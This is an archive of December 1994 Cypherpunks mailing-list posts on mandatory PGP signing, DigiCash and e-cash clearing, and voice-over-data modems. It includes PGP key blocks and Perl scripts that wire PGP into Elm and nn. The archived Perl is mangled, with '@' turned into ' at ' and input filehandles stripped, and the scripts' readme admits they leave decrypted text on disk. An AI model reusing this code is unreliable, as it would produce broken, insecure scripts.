Thu Dec 1 13:56:06 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 13:56:06 PST Subject: "Cyherpunks Named Official Signing Authority" Message-ID: At 3:05 PM 12/01/94, Eric Hughes wrote: >WARNING: The following paragraph does not have direct relevance to the >issue at hand. It discusses servers which might verify signatures, >which my current proposal does not have in it. > >What I have realized in the interim is, that if a server is to verify >a signature, the server should sign not the message but rather the >signature. After all, the signature is what was being verified, not >any property of the message. The user can still detect message >alteration, by first verifying the sig-on-sig, and then comparing the >hash value in the original sig to a hash on the message. I echo Eric's warning, that I also don't mean this to have anything to do with the current thread. The benefit of having the list sign the entire message, is that even if people _don't_ sign the message themselves (assuming they aren't being requried to ;) ), there's still something left to sign. The list would be signing to indicate that, yes, this message did pass through cypherpunks at toad.com. Regardless of whether the author signed the message himself or not, completely different issue. From paul at poboy.b17c.ingr.com Thu Dec 1 14:02:42 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 1 Dec 94 14:02:42 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012151.PAA07927@pentagon.io.com> Message-ID: <199412012201.AA08104@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > paul at poboy.b17c.ingr.com (Paul Robichaux) writes: > [digicash stuff...] > At some point I am going to have to take a look at my NDA with Digicash > again and see how much I can say about the reality of some of these > things... I've asked them to say something. The best I could get out of Paul Dineissen is that they're talking with banks. Well, duh. The _present_ reality is that I can sell things ** and get paid ** if I use First Virtual, but not if I use ecash. > > > > As others have pointed out, > > network bandwidth and processing CPU are cheap enough to allow > > multiple banks to communicate cleanly. Real banks already understand > > how to do this. > Wanna bet? You should get into a clearing discussion with Eric sometime (I > think that the clearing issue must be one of his favorite things in the > world as he has so much to say about it :) Clearing is not only > non-trivial, it can be downright ugly. A small system is not incredibly > difficult to set up, but a nationwide or global system would be something > that would give scores of engineers and designers nightmares for years to > come. Things are easy when you talk about your $50 Visa purchase or check, > but when you start to deal with clearing big aggregate sums through banks > things get real nasty very quickly. Why clear big aggregate sums? Why not just clear smaller ones? Hell, why not use a forwarding engine that just says "this cash came from bank X" and sends it along? I'm sure that the design of a robust, usable system is nontrivial, and I don't mean to imply that it is. I just don't believe that a tool the size of Fedwire and the existing bank architectures are, or will be, required. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt5Hxqfb4pLe9tolAQGA0gQAgd8BcSVu199NjEx3uMq4/ZrtaRA34z/g X/VOMOIfUOuftj2wIiF5iVM5CMOoxMUz4J3gPESIOjZnVEtDUsfsD5aCtTuJW+39 Dmmjkm1nlTynDag7A0tsW39AfqGCpWy4gqcgwhHrvUvKt2Tts/XkvFwkT/wjLM0f 3reNbfPMSZY= =y4mZ -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Thu Dec 1 14:04:57 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 14:04:57 PST Subject: FYI: Eudora and PGP Message-ID: I have heard from the (one of the?) author(s) of Mac Eudora, on another list, that full support for ViaCrypt PGP will be added to the commercial version of Eudora in the spring. And probably PEM support too. It's unclear to me when (if ever :( ) this will be added to the free version of Eudora, or if 2.6ui (the only free (although semi-legal) version of Eudora to support applescript) will be supported to. I still haven't figured out if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which is the neccesary detail there. I found that exciting, and thought others might be interested in hearing it. Or at least consider this post a welcome reprive from the Mandatory Signature Wars. From dcwill at python.ee.unr.edu Thu Dec 1 14:15:48 1994 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Thu, 1 Dec 94 14:15:48 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412012200.OAA13845@largo.remailer.net> Message-ID: <199412012214.OAA10060@python> > > From: "Dr. D.C. Williams" > > I would prefer to teach fewer of them to speak than teach a larger number > of them to grunt. > > From Eric Hughes: > > I would rather that the fewer speak and that the rest grunt rather > than remain silent. It is far better that the silent become speakers rather than grunters. Grunters, and sig spoofers, add nothing to the cause they steadfastly refuse to participate in or join. It would be better for them to remain silent than erode the language of the speakers. Your proposal doesn't reward speaking. It merely allows grunting. Most parents know from first hand experience that very young children learn how to make complete sentences when their parents no longer accept pointing and grunting as acceptable behavior. > Why? Even AOlers can make a bogus sig as a .sig file and attach it to > every outgoing message. > > But this doesn't create even a bogus signature. There's still a line > at the top to add. This misunderstanding about what constitutes valid > syntax colors your whole argument. Excuse me. Let's say that the smarter ones also learn how to add ---------------------BEGIN SILLY EXERCISE------------------------ at the top. Not a Herculean effort for most, and still a lot easier than even retrieving PGP from the MIT site, to say nothing of learning how to use it at the most basic level. > I'm disappointed that your > original objective has been compromised by an "automatic-spoof-is-good > -enough" clause. > > It's not good enough, but it is partial progress. Merely because one > technique doesn't accomplish everything is no reason to abandon it. If it diverts the course of progress away from the desired objective, it deserves to be abandoned. If my goal is increasing my endurance to be able to swim across the lake, I'm not willing to say that making it half way across before developing cramps and drowning is any manner of "partial progress". My whole point is that the cause is noble and worthwhile, but this method of achieving it is flawed, ineffective, and will do more harm than good to the widespread of crypto. If you decide to require digital signatures, it would be far better to require real sigs than bogus sigs. I would urge you to set your sights higher than the goal you've defined so as to allow for the inevitable circumvention that accompanies any new set of requirements. There are plenty of examples of "lowest common denominators" in society today, and I think most people deserve (and prefer) something more than that. =D.C. Williams From mccoy at io.com Thu Dec 1 14:16:05 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 1 Dec 94 14:16:05 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012201.AA08104@poboy.b17c.ingr.com> Message-ID: <199412012215.QAA11431@pentagon.io.com> Paul Robichaux (perobich at ingr.com) writes: > > Things are easy when you talk about your $50 Visa purchase or check, > > but when you start to deal with clearing big aggregate sums through banks > > things get real nasty very quickly. > > Why clear big aggregate sums? Why not just clear smaller ones? Hell, > why not use a forwarding engine that just says "this cash came from > bank X" and sends it along? I will defer to Eric on this one, but what happens is bank X does not seem to respond? What happens if bank X goes bankrupt between the time it says "Yes that coin is good, pay user foo", and the time your bank goes to get the money from bank X to settle it's payment to user foo? Are you going to clear every transaction individually, if so how much more will that cost you than batching transactions? What factors become involved when banks start borrowing money to clear daily transactions among themselves? Take a look at the process involved in clearing checks and you will soon see how it can get very strange. jim From jamiel at sybase.com Thu Dec 1 14:18:24 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Thu, 1 Dec 94 14:18:24 PST Subject: FYI: Eudora and PGP Message-ID: >I have heard from the (one of the?) author(s) of Mac Eudora, on another Just Stever Dorner. Eudora is his baby. >to support applescript) will be supported to. I still haven't figured out >if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which >is the neccesary detail there. Currently, it does (according to a Viacrypt employee and one other person on this list). >Or at least consider this post a welcome reprive from the Mandatory >Signature Wars. Intentionally posting off topic, eh Jonathan? :) -j From geoffrey at crl.com Thu Dec 1 14:22:07 1994 From: geoffrey at crl.com (Geoffrey Faivre-Malloy) Date: Thu, 1 Dec 94 14:22:07 PST Subject: Where to get PGP for SunOS Message-ID: One last question answered and i'll be off and running :) Where can i get PGP for SunOS? Thanks, Geoffrey -------------------------------------------------------------------------- | Geoffrey at crl.com The opinions expressed herein may or | | Geoffrey Faivre-Malloy may not be the opinions of my employer.| | Purple Duck Software Like anyone really cares... | -------------------------------------------------------------------------- | Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342 | -------------------------------------------------------------------------- From KDAGUIO at aba.com Thu Dec 1 14:30:38 1994 From: KDAGUIO at aba.com (KDAGUIO at aba.com) Date: Thu, 1 Dec 94 14:30:38 PST Subject: E-money Good or Bad? Message-ID: It has been my belief that there isn't an effective way for me to use PGP, but with all the hubbub, I thought it might be worthwhile to verify this. My internet access is through a personal account provided by my employer. It is on a machine used exclusively by employees of the University of Illinois (no student accounts). My primary access to this account is through my IBM xt (dos 3.3) at work. This machine is occasionally used by others and is outside of my control. I also use many of the public access Win/Mac machines on campus. I have no pc of my very own. Is there an effective way for me to use PGP? -- Matt Hewn -- Information is not knowledge; knowledge is not wisdom; wisdom is not truth. Truth is absolute. From lmccarth at ducie.cs.umass.edu Thu Dec 1 14:38:31 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 1 Dec 94 14:38:31 PST Subject: Is it happening already ? In-Reply-To: <199412012056.PAA23759@ducie.cs.umass.edu> Message-ID: <199412012238.RAA23999@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- I wrote: > Does someone else have Hal's key ? So far some kind people have sent me two key blocks: The first was - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAiqsNkwAAAEEAMKWM52m5EWi0ocK4u1cC2PPyHT6tavk9PC3TB5XBYDegf3d sldRpnjJj1r+aO08FFO+QLEI9wtBqvf1PPP5iLX7sD2uIVlJH14MPtyVtjm9ZKb8 JMtCW74045BgtHBC9yQ3V7vXNV5jM6dE2ocnH4AI/pBFrGLJPKgTA69YIUw3AAUR tCZIYWwgRmlubmV5IDw3NDA3Ni4xMDQxQGNvbXB1c2VydmUuY29tPg== =4Yeq - -----END PGP PUBLIC KEY BLOCK----- which is for a Compuserve account Hal apparently has. This wasn't used to sign the recent messages. The second was - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAiqsNkwAAAEEAMKWM52m5EWi0ocK4u1cC2PPyHT6tavk9PC3TB5XBYDegf3d sldRpnjJj1r+aO08FFO+QLEI9wtBqvf1PPP5iLX7sD2uIVlJH14MPtyVtjm9ZKb8 JMtCW74045BgtHBC9yQ3V7vXNV5jM6dE2ocnH4AI/pBFrGLJPKgTA69YIUw3AAUR tCZIYWwgRmlubmV5IDw3NDA3Ni4xMDQxQGNvbXB1c2VydmUuY29tPg== =4Yeq - -----END PGP PUBLIC KEY BLOCK----- which didn't contain any keys I didn't already have. I'm still seeking the key used to sign the recent messages from Hal. I should have mentioned before that it should have Key ID 4ECBD301. When I find it I'll send it to the list. - -L. Futplex McCarthy; PGP key by finger or server "Don't say my head was empty, when I had things to hide...." --Men at Work -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt5QXmf7YYibNzjpAQHnUwP/efaYMxT1cEBtxMPq6n3oG6i9YeKx/pv1 2P4tshd29QhddpYjAUxwwq/iEgGs92t1H4VUx6qWAy+zXm88XWd6S+WmJFbDDgci dS5pgKbfe4XnKKEbroPyVRV9I4VQwcwGDE+RXE0n8MsJ5hr8ZEauRLVHaSukOH5Q kTinxPVNL0I= =/RFx -----END PGP SIGNATURE----- From jamiel at sybase.com Thu Dec 1 14:39:51 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Thu, 1 Dec 94 14:39:51 PST Subject: Brands excluded from digicash beta Message-ID: >Paul Robichaux (perobich at ingr.com) writes: >Take a look at the process involved in clearing checks and you will soon >see how it can get very strange. If clearing sounds simple, may I suggest as a general rule of thumb to look at the complexities involved with transaction management in distributed database environment, and multiply the complexity found there by the number of banks worldwide. Then, find a way to factor in a many-to-many instead of a one-to-few achitecture. And that rule of thumb completely ignores the fact that if a transaction is fouled up anywhere along the line, one finds extensive legal liability involved instead of a 'mere' corrupt table in a database. -j >jim From jamiel at sybase.com Thu Dec 1 14:42:31 1994 From: jamiel at sybase.com (Jamie Lawrence) Date: Thu, 1 Dec 94 14:42:31 PST Subject: E-money Good or Bad? Message-ID: >The following is not flamebait!!! Heh... Nice try. -j From hfinney at shell.portal.com Thu Dec 1 14:51:07 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 1 Dec 94 14:51:07 PST Subject: Is it happening already ? Message-ID: <199412012250.OAA10476@jobe.shell.portal.com> Here is my key. I just sent it to the keyservers. I hadn't had a chance to sign it with my secure key yet. Hal -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBNAy7bVn8AAAECAPRhqHLha5WFaFQw0/b1Wn8XCuHokjvbEeJbg5UPHs6fBE3i uZTmAY5aFqnFXOdNGackOOTYu3tEGcwsm07L0wEABRG0F0hhbCBGaW5uZXkgaW5z ZWN1cmUga2V5iQCVAwUQLt5K9agTA69YIUw3AQED0gQAoORH1weDQ+L2gefrRauI GLqDlNy0nJQDo5wgdJky5Pd7vUJalwxGuqnQG1QV+ejnRYEN7wEoYQRjv21tTos9 nbUtWAoINrEVjWHpG7AXIRNyoCJtket9mQ2jz9QNTD9Nt8JsedJlqLuT7RMLN1tb /cIYnrBCyuTCek4fRbTYkSU= =G3nF -----END PGP PUBLIC KEY BLOCK----- From ianf at sydney.sgi.com Thu Dec 1 14:53:53 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 1 Dec 94 14:53:53 PST Subject: More on ASIS... Message-ID: <9412020943.ZM11558@wiley.sydney.sgi.com> I was told this morning that the ASIS post had been reposted to several other lists, including several social ones. Interesting... Anyway, there was a followup to the incident on the radio this morning (2BL, is anyone was listenning): Gareth Evans (Minister for Foreign Affairs) has announced that no documents were irretrievably lost in the fire, as everything which was lost in the fire was also duplicated elsewhere. In addition to this, the fire is being referred to the ACT coroner's office, as despite the original claim by the Federal Government that there were no suspicious circumstances, the Australian Federal Police have decided to do pursue this action. It is not clear yet whether this is a matter of proceedure, or whether suspicious circumstances are suspected. The government's original claim was produced with surprisingly little time for investigation, it has been noted. Ian. From die at pig.die.com Thu Dec 1 15:03:36 1994 From: die at pig.die.com (Dave Emery) Date: Thu, 1 Dec 94 15:03:36 PST Subject: recent voice over data In-Reply-To: <199412012150.NAA13820@largo.remailer.net> Message-ID: <9412012302.AA02541@pig.die.com> > > > the great voice-over-data protocols and products introduced by > Intel, Rockwell, ZyXEL and others at Comdex which will make > Voice-PGP so much easier > > As I understand these voice-over-data products, the voice goes over > analog, added to the modem signal. The modem signal is interpreted, > and then reconstructed and subtracted from the incoming signal, > leaving voice. Very clever, but insufficient for secure phones. > I can't quite see how this would work unless the voice was run at a very low level relative to the data. In order to subtract the modulated version data coming from the other end you have to know exactly what it is, and in order to do that you need sufficient signal to noise of data over everthing else to reliably demodulate it or you need some means of reliably predicting it. Now I recognize that some of the time there is little or no entropy in the information in one direction (it is completely predictable - such as flags during LAPM idle intervals) and it is possible that one could contruct a syllabic gizmo that would turn off the entropy in the data when talkspurts happened by doing flow control and stopping information transmission during periods that speech was loud. But all of this seems a bit much, and certainly would be subject to lots of kinds of degradation depending on the speech content and any nolinearity in the channel. In general the modulations used in modems require at least 12-15 db of SNR for decent BERs - this would imply that if the line was not timeshared with voice in talkspurts that the peak level of the voice would have to be about 20 db below the modem tones. I guess that this would still result in intelligible speech even though it would effectively be transmitted by only a couple of bits per 8 khz sample. And yes I guess that by using forward error correction on the data at a variable coding rate one could allow the voice to creep up on the data a bit more by using a heavier duty error correction during talk spurts. I had assumed that these products digitized voice and multiplexed it with the data stream however. Certainly there are technologies to do this including variable rate vocoding (ala Qualcomm) that would allow almost the full bandwidth of the line to be used for data. [ And yes I'll bring up premail tommorow so I can sign things if I can get around to it without interrupting serious work work - but I'm left wondering who in the hell would want to forge posts from me ? ] Dave Emery N1PRE From adam at bwh.harvard.edu Thu Dec 1 15:11:08 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 1 Dec 94 15:11:08 PST Subject: FYI: Eudora and PGP In-Reply-To: Message-ID: <199412012310.SAA05631@bwface.bwh.harvard.edu> All of MacPGP 2.3v1.1, MacPGP2.6ui, and Viacrypt PGP 2.7 can be driven via the use of AppleEvents, by the macpgp kit. This leads one to believe that all three use the same suite of events. My scripting environment is broken, so I can't actually test to see that the entire suite is the same. The macpgp kit can be found at duke.bwh.harvard.edu:/pub/adam/mcip | to support applescript) will be supported to. I still haven't figured out | if ViaCrypt MacPGP uses the same applescript suite as MacPGP 2.6ui, which | is the neccesary detail there. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From shamrock at netcom.com Thu Dec 1 15:28:33 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 1 Dec 94 15:28:33 PST Subject: Why nothing works [Was: Mandatory sig workaround] Message-ID: <199412012323.PAA12571@netcom13.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Roy wrote in response to Tim: >Tim, just for fun, what tools would need to appear to make it possible >for you to sign your traffic? Maybe a description will inspire some of >the Macheads out there to get hacking. (the astute reader will note >that I'm not suggesting new tools to the erstwhile Mr. May, as has been >done so often in the past) There is no hacking in the world that could create the kind of tool that would be needed to satisfy Tim. What would be required to satisfy Tim can't be done and I think that most long time CP's are be well aware of that. We have had this discussion over and over for many issues (PGP, MIME,..) for the last two years. The problem isn't that there are no tools for Tim's Mac, the problem is that there is _no way_ to do all these things on Netcom's UNIX host. 1. Tim: "I can't do any of the new things you are proposing because I don't have the tools." 2. Some CP: "Just download your mail to your local machine and process it there. There are many great ways to automate this on a Mac." 3. Tim: "I don't want to have to download mail for processing. I want to be able to do it all on Netcom's machine." 4. Some CP: "Just run PGP on Netcom's machine and process the mail there.' 5. Tim: " Using PGP on a shared machine is a security risk." 6. Some CP: "Just use a low security key on Netcom to sign your messages." 7. Tim: "PGP on a timeshare is worse than nothing. It gives a wrong sense of security. " 8. Some CP: "Since you don't want to do it on the host and you don't want to do it on another machine, there is no way for you to do it." 9. GOTO 1. No, the above is not a quote of an acctual exchange, but rather an abreviated version of what I gathered from reading hundreds of messages and dozens of threads. YMMV, - --Lucky -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLt41vASQkem38rwFAQFNRwP8DjwJ37unGf27LscvTOCU699wvXvH/pEI kBdvRCHJNQbcerBc7SDwjgVJC3XaaIDlO1rqBfcZXZETOa/3EKnjFHiX0+6Kb0zo b1k2lTmzFG7su2biwkmYkI5TlYEM4/nTpq/vYjZ3Md5rjXm5wA+cJcfivJd8RdX6 fRwWq2QXerM= =z9wu -----END PGP SIGNATURE----- From raph at netcom.com Thu Dec 1 15:40:23 1994 From: raph at netcom.com (Raph Levien) Date: Thu, 1 Dec 94 15:40:23 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412011627.IAA14481@jobe.shell.portal.com> Message-ID: <199412012339.PAA10951@netcom17.netcom.com> I also have had no luck getting a beta client from digicash. I "registered" through their WWW forms page, and got no response for about a month. Then they sent me mail saying that they would be sending a client, but that they were unrolling it in stages. That was about a month ago. Perhaps this means I will get my client soon. This does not speak well for digicash. If they were not ready to beta their stuff, they should not have announced it. As it is, it makes them look like a flake. BTW, I am beginning to amass NexusBucks. I would _really_ like to buy something with them, just to prove their viability. They are exchangable 1-for-1 for US$, but only in terms of services on Sameer's system. If anyone has a t-shirt or somehting similar that they'd like to sell, please let me know. Perhaps we should make the Cypherpunks motto a bit less ambitious. Instead of "Cypherpunks write code," how about merely "Cypherpunks use tools." Raph From greg at ideath.goldenbear.com Thu Dec 1 15:48:17 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 1 Dec 94 15:48:17 PST Subject: PGP signing tools for Elm/Pine/nn Message-ID: <199412012347.AA13396@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Recent comments re the signing controvery give me the impression that a repeat of this information might be useful. I apologize if this seems like a waste of bandwidth. I can't seem to find a copy of a tool to make .shar's (or whatever one calls them) so I've separated files with ===== markers. I have also uploaded a gzip'ed .tar of these files, plus a gzip'ed copy of the mkpgp.txt.uu document referenced below, to cypherpunks/incoming on ftp.csua.berkeley.edu. These scripts + a copy of PGP interface nicely with Pine or Elm and NN to sign/encrypt outgoing messages, and decrypt or signature- verify incoming mail. The four files below came with the PGP 2.3 distribution (under contrib/elm_nn); they were not included in the laster distributions. I don't know why. They still seem to work fine with the newer MIT-PGP stuff. The "mkpgp" script referenced in Michael Handler's message seems to work fine from inside Pine; but I mostly stick with Elm and nn, so haven't used it much. Again, sorry to use list bandwidth for this; I thought that these were already in the hands of most of the folks on the list but the last few days' messages make me feel uncertain about that. (And no, for the zillionth time, it's not great policy to use PGP on a machine where you're not root. Use a small key marked "unsecure" and get on with life. It won't protect you from root but it will protect you from Detweiler and other small-time annoyances.) ===== Michael Handler's message ===== From: Michael Handler Subject: Interfacing PGP with Pine (Script pointer) Date: 25 Nov 1994 07:03:03 -0800 Message-ID: For a well written script to interface PGP with Pine: finger slutsky at lipschitz.sfasu.edu | pgp -f > mkpgp.txt.uu If you don't have finger access, mail me privately, and I'll send the file to you. Mike, who is only as elegant as his actions let him be - -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics VoicePGP Development Team soc.support.youth.gay-lesbian-bi co-moderator ===== readme ===== To integrate PGP 2.1 with Elm and NN: 0) Make sure the path of Perl in the first line of each of the three files reflects the full path of this utility for your system. Also, make sure that the EDITOR and PAGER environment variables reflect your editor and pager of choice (vi and less will be used by default). 1) Put the files morepgp, mailpgp, and postpgp in one of the directories on your PATH. 2) Modify your ~/.elm/elmrc file to contain the following lines: editor = mailpgp pager = morepgp 3) Modify your ~/.nn/init file to contain the following lines: set editor postpgp That's all folks! Now, each time you post a message or reply to a message with nn, after you exit your editor, you will be asked whether you want to sign your message. Each time you compose a private message with elm, or reply to a message, and leave the editor, you'll be asked whether you want to sign and/or encrypt the message. When you browse a message, if it contains any PGP blocks, those will be properly interpreted. When you reply to a message containing PGP blocks, you'll have them properly decrypted and quoted in your editor. BUGS 1) You cannot encrypt messages that you mail from nn. You can only sign them. 2) When you reply to a PGP-encryted message, the encrypted message is temporarily kept on the disk, which is a security hole. 3) The temporary files are not wiped out, they are just deleted. 4) The scripts are ugly, reflecting my lack of knowledge of Perl. In fact, I don't know Perl at all; I hacked somebody else's scripts. If you know Perl better then me, please feel free to improve the scripts and don't forget to mail me a copy of the improved version. I can be contacted as Vesselin Bontchev at bontchev at fbihh.informatik.uni-hamburg.de ===== mailpgp ===== #!/usr/bin/perl ($visual = $ENV{'VISUAL'}) || ($visual = '/usr/ucb/vi'); $topgp = 0; $blanks = 0; $paragraphs = 1; $blankcompress = 1; $name=@ARGV[$#ARGV]; umask (077); open (INPUT, "<$name"); open (OUTPUT, ">${name}.rply") || die "Cannot open ${name}.rply for output.\n"; while () { if (!$topgp && !m/^> -----BEGIN PGP .*-----/) { if (m/^> *$/) { if ($paragraphs) { if ($blankcompress) { if ($blanks == 0) { print OUTPUT "\n"; $blanks = 1; } } else { print OUTPUT "\n"; } } else { print OUTPUT; } } elsif (m/^ *$/) { if ($blankcompress) { if ($blanks == 0) { print OUTPUT "\n"; $blanks = 1; } } else { print OUTPUT; } } else { print OUTPUT; if ($. == 1 && !m/^> /) { print OUTPUT "\n"; $blanks = 1; } else { $blanks = 0; } } } if (!$topgp && m/^> -----BEGIN PGP .*-----/) { $topgp = 1; $tmpfile = "${name}.pgp", unlink ($tmpfile); open (TMPFILE, ">$tmpfile") || die "Cannot open $tmpfile for output.\n"; } if ($topgp) { $_ =~ s/^> //; print TMPFILE $_; if (m/^-----END PGP .*-----/) { $topgp = 0; close TMPFILE; $clrfile = "${name}.clr"; `pgp $tmpfile -o $clrfile`; open (CLEAR, "<$clrfile") || die "Cannot open $clrfile for input.\n"; print OUTPUT "-----BEGIN OF PGP DECRYPTED TEXT-----\n\n"; while () { if (m/^$/) { print OUTPUT "\n"; } else { print OUTPUT "> "; print OUTPUT; } } close CLEAR; unlink ($clrfile); unlink ($tmpfile); print OUTPUT "\n-----END OF PGP DECRYPTED TEXT-----\n\n"; } } } close OUTPUT; close INPUT; unlink ($name); rename ("${name}.rply", "$name"); system ($visual, at ARGV); while (!$q) { print "Sign this message? [Y]: "; $q = ; $q =~ s/[ \t\n]//g; $q = substr ($q, 0, 1); if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) { push(@opts,'-st','+clearsig=on'); $q = "y"; } elsif (($q ne 'N') && ($q ne 'n')) { $q = ''; } } $q=''; while (!$q) { print "Encrypt this message? [Y]: "; $q = ; $q =~ s/[ \t\n]//g; $q = substr ($q, 0, 1); if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) { push(@opts,'-e'); $q = "y"; } elsif (($q ne 'N') && ($q ne 'n')) { $q = ''; } } if (@opts) { system ('pgp','-a', at opts,$name); if ($? == 0) { unlink ${name}; rename ("${name}.asc", "$name"); } } ===== morepgp ===== #!/usr/bin/perl # written by jason steiner, jsteiner at anwsun.phya.utoledo.edu, Jan 1993 # # if you use or make improvements to this program i would appreciate # copies of your modifications & your PGP public key. $|=1; $topgp=0; $logname = $ENV{'LOGNAME'}; $pager='/usr/local/bin/less -i -n -s -S -c -M'; $pager = $ENV{'PAGER'} if ($ENV{'PAGER'}); umask 077; open (PAGER, "|$pager") || die "Cannot open pipe to $pager.\n"; print PAGER "\n"; while (<>) { if (!$topgp && m/^-----BEGIN PGP .*-----/) { $topgp = 1; $tmpfile = "/tmp/.pgp.$logname.$$"; unlink($tmpfile); open (TMPFILE, ">$tmpfile") || die "Cannot open $tmpfile for output.\n"; } if (!$topgp) { print PAGER; } else { print TMPFILE $_; if (m/^-----END PGP .*-----/) { $topgp = 0; close TMPFILE; open (CLEAR, "pgp -f < $tmpfile |") || die "Cannot open pipe to PGP.\n"; print PAGER "-----BEGIN PGP DECRYPTED BLOCK-----\n"; while () { print PAGER; } close CLEAR; unlink($tmpfile); print PAGER "-----END PGP DECRYPTED BLOCK-----\n"; } } } close PAGER; ===== postpgp ===== #!/usr/bin/perl # written by jason steiner, jsteiner at anwsun.phya.utoledo.edu, Jan 1993 # # if you use or make improvements to this program i would appreciate # copies of your modifications & your PGP public key. ($visual = $ENV{'VISUAL'}) || ($visual = '/usr/ucb/vi'); system($visual, at ARGV); while (!$q) { print "Sign this message? [Y]: "; $q = ; $q =~ s/[ \t\n]//g; $q = substr ($q, 0, 1); if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) { push(@opts,'-st','+clearsig=on'); $q = "y"; } elsif (($q ne 'N') && ($q ne 'n')) { $q = ''; } } if (@opts) { $name = $ARGV[$#ARGV]; umask(077); open(INPUT,$name); open(HEAD,">${name}.head"); open(BODY,">${name}.body"); while () { if (1 .. /^$/) { print HEAD; if (m/^From: / || m/^To: / || m/^Date: /) { print BODY; } } else { print BODY; } } close(HEAD); close(BODY); system('pgp','-a', at opts,"${name}.body"); if ($? == 0) { unlink($name); system "cat ${name}.head ${name}.body.asc > $name"; } unlink("${name}.head"); unlink("${name}.body"); unlink("${name}.body.asc"); } -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt5gen3YhjZY3fMNAQF1QwP+OETB9ibDTWxLJ3BWQsgG5tAIeSHgeWs7 cOasOVidSoHJ10LPbOjwfCP9mluUTpsWNzIXC3GRSh5QO0esOPubu5CsFUaouEo8 DwvAik5kxIUcztqry8ImktFY14UmLZDjHshN+2WU7yLNG0BBM4C2mfwqkKDN9ESX ZK2bJj2LVF0= =2toZ -----END PGP SIGNATURE----- From db at Tadpole.COM Thu Dec 1 16:08:49 1994 From: db at Tadpole.COM (Doug Barnes) Date: Thu, 1 Dec 94 16:08:49 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012056.AA05724@poboy.b17c.ingr.com> Message-ID: <9412020007.AA10969@tadpole> Paul wrote: > > I'm sure that the design of a robust, usable system is nontrivial, and > I don't mean to imply that it is. I just don't believe that a tool the > size of Fedwire and the existing bank architectures are, or will be, required. > My $0.02: The size or complexity of Fedwire is not the issue (it's actually pretty simple compared to some off the suggestions I've heard recently). Nor is this merely a matter of designing robust computer programs (although this is very important). What is important is the degree of trust between the clearing parties, the legal arrangements between the clearing parties, and the backend of the clearing mechanism, which is settlement -- how you balance out the real money accounts. Let's say you have two banks, X and Y. Bank X has slightly more merchant activity than bank Y, as bank Y is more consumer oriented. Therefore bank Y is going to receive more real dollars from its customers, and bank X is going to pay out more real dollars to its customers. If these two banks are part of the same clearing system, then it is certain that the net flow of e-cash from Y to X is going to need to be accompanied by a flow of real US$ from bank Y to bank X. This is called settlement. In reality, these things are extremely dynamic, changing on a minute-by-minute basis throughout a clearing system, but let's stick with this simple example. As Mr. Hughes pointed out recently, the question is not whether the system works when everything goes as expected, but rather what happens when things fail unexpectedly. For instance, if bank X has credited the accounts of its customers (the merchants) while waiting for bank Y to make an offsetting real cash transfer, and bank Y goes bankrupt (or is declared insolvent or whatever), then bank X is out that money. There are three possible solutions. One partial solution is to not treat e-cash as cash -- the balance does not become available at bank X until a settlement period has passed. At this point, you might as well stop calling it e-cash, and call it an e-check. It's still a non-trivial situation if the bank the check is written on goes belly-up, but there is less exposure to fraud, with an offsetting nervousness on the part of the merchant that the e-check will bounce. The second possibility is for all the clearing house members to trust some central entity to handle the clearing and insulate them from the bankruptcy of the individual members. This is how Fedwire works, and it is arguably simpler than various types of peer-to-peer clearing systems, but requires a great deal of trust in that central entity. It also could have more catastrophic consequences in the event of the failure of that central entity. The third is that X and Y belong to a clearing association. Banks might settle deficit positions with one another (a 'net' system), and could negotiate a certain deficit level with all others in the system. If a deficit was exceeded during the clearing, a partial settlement would be required from one member to another. A variant on this is the 'net-net' system, where banks are allowed a certain deficit position with respect to the clearing system as a whole, and losses are shared according to some formula in the event of a bankruptcy. Settlement is done by a bank's paying into (or receiving from) the system according to its position at the end of the settlement period. This doesn't sound too complex, until you start to read the relevant parts of the Uniform Commercial Code. To paraphrase the docco for the xterm source code, "If you think you understand this right away, you probably don't. It is a hideous mess." The question of what should happen to e-cash caught in the flux of the bankruptcy of a member of an e-cash clearing association is not immediately clear and is every bit as important a question as the specification of the computer protocols. It involves careful contemplation of the relevant law, carefully construted contractural arrangements, and robust, well-written software. Note that it becomes almost 